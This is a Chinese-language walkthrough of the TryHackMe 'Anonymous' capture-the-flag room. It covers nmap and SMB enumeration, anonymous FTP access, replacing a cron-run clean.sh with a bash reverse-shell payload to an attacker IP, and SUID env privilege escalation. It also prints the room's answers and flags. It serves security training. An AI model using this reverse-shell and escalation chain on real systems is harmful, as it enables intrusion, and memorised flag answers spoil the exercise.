服务发现

┌──(rootkali)-[~/tryhackme/Anonymous]└─# nmap -sV -Pn 10.10.249.116    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-18 06:12 EDTNmap scan report for 10.10.249.116Host is up (0.31s latency).Not shown: 996 closed portsPORT    STATE SERVICE     VERSION21/tcp  open  ftp         vsftpd 2.0.8 or later22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.67 seconds

剖析

只有4个服务端口，没有http，能够先答复后面三个问题

问题1：Enumerate the machine. How many ports are open?
答案：4

问题2：What service is running on port 21?
答案：ftp

问题3：What service is running on ports 139 and 445?
答案：smb

浸透smb服务,应用enum4linux

┌──(rootkali)-[~/tryhackme/Anonymous]└─# enum4linux 10.10.249.116                     Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 18 06:29:35 2021 ========================== |    Target Information    | ========================== Target ........... 10.10.249.116RID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ========================================== |    Share Enumeration on 10.10.249.116    | ==========================================         Sharename       Type      Comment        ---------       ----      -------        print$          Disk      Printer Drivers        pics            Disk      My SMB Share Directory for Pics        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))SMB1 disabled -- no workgroup available[+] Attempting to map shares on 10.10.249.116//10.10.249.116/print$  Mapping: DENIED, Listing: N/A//10.10.249.116/pics    Mapping: OK, Listing: OK//10.10.249.116/IPC$    [E] Can't understand response:NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

咱们看到有一个pics文件夹开启了分享

问题4：There's a share on the user's computer. What's it called?
答案：pics

咱们用smbclient工具登录到这个文件夹，把下面的文件下载下来剖析

┌──(rootkali)-[~/tryhackme/Anonymous]└─# smbclient  //10.10.249.116/pics                                                                                                                                                                                                   130 ⨯Enter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> ls  .                                   D        0  Sun May 17 07:11:34 2020  ..                                  D        0  Wed May 13 21:59:10 2020  corgo2.jpg                          N    42663  Mon May 11 20:43:42 2020  puppos.jpeg                         N   265188  Mon May 11 20:43:42 2020

把jpg文件下载到本地，用exiftool命令剖析，能够取得文件的形容内容
Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236

文件的作者：
Tatyana Panova

在这里咱们起码能够拿到3个用户名：

Denise FlaimSusan SprungTatyana Panova

尝试用hrdra爆破下面用户名的ssh，然而无所获。。。

ftp能够匿名登录，把文件全副下载到本地剖析

┌──(rootkali)-[~/tryhackme/Anonymous]└─# ftp 10.10.249.116Connected to 10.10.249.116.220 NamelessOne's FTP Server!Name (10.10.249.116:root): anonymous331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts226 Directory send OK.ftp> cd scripts250 Directory successfully changed.ftp> ls -alh200 PORT command successful. Consider using PASV.150 Here comes the directory listing.drwxrwxrwx    2 111      113          4096 Jun 04  2020 .drwxr-xr-x    3 65534    65534        4096 May 13  2020 ..-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh-rw-rw-r--    1 1000     1000         1935 Oct 18 10:20 removed_files.log-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt

一个个文件剖析
文件1：clean.sh:

┌──(rootkali)-[~/tryhackme/Anonymous]└─# cat clean.sh            #!/bin/bashtmp_files=0echo $tmp_filesif [ $tmp_files=0 ]then        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.logelse    for LINE in $tmp_files; do        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;donefi

就是一个清理/tmp文件夹下的脚本,不过那个判断貌似永远不会进入else分支，清理记录写入removed_files.log.裸露了FTP的目录是 /var/ftp

文件2removed_files.log 是下面脚本的记录，没有有用的信息

文件3：to_do.txt

┌──(rootkali)-[~/tryhackme/Anonymous]└─# cat to_do.txt        I really need to disable the anonymous login...it's really not safe

咱们看到clean.sh的权限对于匿名用户是可读可写的，清理长期文件夹这种动作也有可能是某种定时工作，如果咱们能够替换这个bash文件，那么咱们就有可能拿到反弹shell

验证

为了验证bash脚本是一个定时工作，咱们批改bash的脚本为：

#!/bin/bashecho "$(date)" >> /var/ftp/scripts/removed_files.log

如果新生成的数据显示了日期，那么就能够证实咱们的猜测，而且比对两次工夫日期能够失去定时工作的频率

上传新的bash

ftp> put /root/tryhackme/Anonymous/clean.sh ./clean.shlocal: /root/tryhackme/Anonymous/clean.sh remote: ./clean.sh200 PORT command successful. Consider using PASV.150 Ok to send data.226 Transfer complete.65 bytes sent in 0.00 secs (793.4570 kB/s)

等两分钟后，下载日志

┌──(rootkali)-[~/tryhackme/Anonymous]└─# cat removed_files.log  Running cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteRunning cleanup script:  nothing to deleteTue Oct 19 07:11:01 UTC 2021Tue Oct 19 07:12:01 UTC 2021

最初两行果然是打印了咱们批改的日志信息，而且由工夫能够看出定时工作是一分钟执行一次

shell

编辑clean.sh,payload如下

#!/bin/bashbash -i >& /dev/tcp/10.13.21.169/4242 0>&1

本地开启监听，拿到初始shell

┌──(rootkali)-[~]└─# nc -lnvp 4242                 listening on [any] 4242 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.249.116] 59716bash: cannot set terminal process group (1283): Inappropriate ioctl for devicebash: no job control in this shellnamelessone@anonymous:~$ ididuid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)namelessone@anonymous:~$ whoamiwhoaminamelessonenamelessone@anonymous:~$ 

在user目录拿到user.txt

lspicsuser.txtcat user.txt90d6f992585815ff991e68748c414740

问题5：user.txt
答案：90d6f992585815ff991e68748c414740

提权

把linpeas传到靶机，枚举靶机的提权破绽，发现一个能够提权的SUID：env
利用env提权，拿到root.txt

/usr/bin/env /bin/sh -pwhoamirootcat /root/root.txt4d930091c31a622a7ed10f27999af363

问题6：root.txt
答案：4d930091c31a622a7ed10f27999af363

另外，shell用户自身在lxd组用户，对于lxd组用户提权，我在这台靶机里有具体记录，这里不再演示。